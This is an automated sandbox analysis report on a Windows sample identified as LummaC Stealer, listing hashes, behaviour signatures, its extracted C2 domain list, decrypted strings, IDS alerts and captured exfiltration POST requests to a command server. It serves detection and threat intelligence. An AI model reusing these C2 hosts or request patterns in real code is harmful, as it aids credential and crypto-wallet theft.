
Windows Analysis Report
alexshlu.exe

Overview

General Information

Sample name: alexshlu.exe
Analysis ID: 1577338
MD5: 9821fa45714f3b4538cc017320f6f7e5
SHA1: 5bf0752889cefd64dab0317067d5e593ba32e507
SHA256: fd9343a395c034e519aea60471c518edbd8cf1b8a236ec924acf06348e6d3a72
Tags: 18521511316185215113209bulletproofexeuser-abus3reports

Detection

LummaC Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • alexshlu.exe (PID: 7620 cmdline: "C:\Users\user\Desktop\alexshlu.exe" MD5: 9821FA45714F3B4538CC017320F6F7E5)
    • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alexshlu.exe (PID: 7720 cmdline: "C:\Users\user\Desktop\alexshlu.exe" MD5: 9821FA45714F3B4538CC017320F6F7E5)
  • cleanup
{"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "covery-mover.biz", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dare-curbys.biz", "drive-connect.cyou", "print-vexer.biz"], "Build id": "FATE99--november"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000003.00000003.1669509041.0000000000CF3000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: alexshlu.exe PID: 7720 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: alexshlu.exe PID: 7720 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: alexshlu.exe PID: 7720 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
                No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-18T12:08:05.461549+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP
2024-12-18T12:08:08.583198+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:12.934292+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:18.263337+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:21.853001+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:26.165876+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49713 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:32.213117+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49714 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:34.746544+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:40.694942+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.8 | 49716 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:11.606157+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:16.629559+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:41.408657+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.8 | 49716 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:11.606157+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.8 | 49707 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:16.629559+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.8 | 49708 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:02.913400+0100 | 2057973 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 58758 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.147869+0100 | 2057975 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 51738 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.451321+0100 | 2057979 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 63332 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.688843+0100 | 2057977 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49948 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.701372+0100 | 2057969 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 63719 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:03.390183+0100 | 2057971 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 60764 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:01.982894+0100 | 2057983 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 56041 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:02.221141+0100 | 2057981 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 65295 | 1.1.1.1 | 53 | UDP
2024-12-18T12:08:20.477697+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49709 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:34.751527+0100 | 2843864 | 1 | A Network Trojan was detected | 192.168.2.8 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-18T12:08:06.238765+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.8 | 49706 | 23.55.153.106 | 443 | TCP


                AV Detection

Source: https://impend-differ.biz:443/apiG | Avira URL Cloud: Label: malware
Source: 00000000.00000002.1377966882.0000000002723000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["dwell-exclaim.biz", "formy-spill.biz", "covery-mover.biz", "zinc-sneark.biz", "se-blurry.biz", "impend-differ.biz", "dare-curbys.biz", "drive-connect.cyou", "print-vexer.biz"], "Build id": "FATE99--november"}
Source: alexshlu.exe | ReversingLabs: Detection: 73%
Source: alexshlu.exe | Virustotal: Detection: 75%
Source: alexshlu.exe | Joe Sandbox ML: detected
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: impend-differ.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: print-vexer.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: dare-curbys.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: covery-mover.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: formy-spill.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: dwell-exclaim.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: zinc-sneark.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: se-blurry.biz
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: drive-connect.cyou
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000003.00000002.1775218648.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String decryptor: FATE99--november
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_00416B7E CryptUnprotectData, 3_2_00416B7E
Source: alexshlu.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.8:49716 version: TLS 1.2
Source: alexshlu.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_ISOLATION, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002C0868 FindFirstFileExW, 0_2_002C0868
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 0_2_002C0919 FindFirstFileExW, FindNextFileW, FindClose, FindClose, 0_2_002C0919
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002C0868 FindFirstFileExW, 3_2_002C0868
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 3_2_002C0919 FindFirstFileExW, FindNextFileW, FindClose, FindClose, 3_2_002C0919
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h] | 3_2_0040A960
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h] | 3_2_00426170
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then push eax | 3_2_0040C36E
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 3_2_0043DBD0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov edx, ecx | 3_2_00409CC0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh | 3_2_0043DCF0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [edx], bl | 3_2_0040CE55
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h] | 3_2_0042C6D7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [esi], al | 3_2_0042C6D7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h] | 3_2_0042C6D7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [eax], dx | 3_2_00417E82
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh | 3_2_0043E690
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] | 3_2_0042BFD3
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah] | 3_2_0042BFDA
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 3_2_0042A060
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh] | 3_2_00425F7D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov edx, ecx | 3_2_0041D074
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov edx, ecx | 3_2_0041D087
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [esi], cl | 3_2_0042D085
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 3_2_0041597D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 3_2_00416E97
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov edi, eax | 3_2_00416E97
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov ebx, eax | 3_2_00405910
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov ebp, eax | 3_2_00405910
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h | 3_2_00425920
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_004286F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh] | 3_2_00417190
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov ecx, eax | 3_2_00422270
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h | 3_2_0040C274
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [00444284h] | 3_2_00425230
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0043CAC0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch] | 3_2_004292D0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov edx, ebx | 3_2_004292D0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then add ebp, dword ptr [esp+0Ch] | 3_2_0042AAD0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [eax], cl | 3_2_00415ADC
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ebx, bx | 3_2_0042536C
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ebx, byte ptr [ecx+esi] | 3_2_00402B70
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [ecx], dx | 3_2_00427307
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2] | 3_2_00436B20
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0043CBD6
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 3_2_00407470
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 3_2_00407470
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then jmp eax | 3_2_0042B475
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h | 3_2_00419C10
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0043CCE0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov byte ptr [ebx], al | 3_2_0042B4BB
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0043CD60
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 3_2_004345F0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch] | 3_2_00427653
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov eax, dword ptr [ebp-10h] | 3_2_0043CE00
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 3_2_0042A630
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h] | 3_2_004296D8
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh] | 3_2_00415EE0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_00421EE0
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp al, 2Eh | 3_2_004266E7
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h | 3_2_0041CEA5
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then add ebx, 03h | 3_2_00428F5D
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h | 3_2_00414F08
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov ecx, edx | 3_2_00414F08
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [eax], cx | 3_2_00420717
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then mov word ptr [ecx], dx | 3_2_00420717
Source: C:\Users\user\Desktop\alexshlu.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h | 3_2_0043DFB0

                Networking

Source: Network traffic | Suricata IDS: 2057949 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.8:65295 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057925 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.8:58758 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057973 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (covery-mover .biz) : 192.168.2.8:58758 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057943 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.8:60764 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057971 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (print-vexer .biz) : 192.168.2.8:60764 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057981 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (zinc-sneark .biz) : 192.168.2.8:65295 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057927 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.8:51738 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057975 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dare-curbys .biz) : 192.168.2.8:51738 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057931 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.8:49948 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057935 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.8:63719 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057969 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impend-differ .biz) : 192.168.2.8:63719 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057977 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (formy-spill .biz) : 192.168.2.8:49948 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057929 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.8:63332 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057979 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dwell-exclaim .biz) : 192.168.2.8:63332 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057945 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.8:56041 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057983 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (se-blurry .biz) : 192.168.2.8:56041 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49716 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.8:49706 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.8:49708 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.8:49708 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.8:49709 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.8:49715 -> 172.67.157.254:443
Source: Malware configuration extractor | URLs: dwell-exclaim.biz
Source: Malware configuration extractor | URLs: formy-spill.biz
Source: Malware configuration extractor | URLs: covery-mover.biz
Source: Malware configuration extractor | URLs: zinc-sneark.biz
Source: Malware configuration extractor | URLs: se-blurry.biz
Source: Malware configuration extractor | URLs: impend-differ.biz
Source: Malware configuration extractor | URLs: dare-curbys.biz
Source: Malware configuration extractor | URLs: drive-connect.cyou
Source: Malware configuration extractor | URLs: print-vexer.biz
Source: Joe Sandbox View | IP Address: 23.55.153.106
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49706 -> 23.55.153.106:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49712 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49708 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49714 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49707 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49709 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49716 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49715 -> 172.67.157.254:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49713 -> 172.67.157.254:443
Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 50 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=N08MCDNNF0PK0HU2Z | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12843 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UZISBZQ0QWSQV5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15054 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=DBZLQE7OO4ZHJHDX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20233 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=XRK0RM6J3 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1171 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=2CZLVT98GDNSWI | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 582063 | Host: lev-tolstoi.com
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 85 | Host: lev-tolstoi.com
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (11 identical events)
                Source: global traffic | HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Host: steamcommunity.com
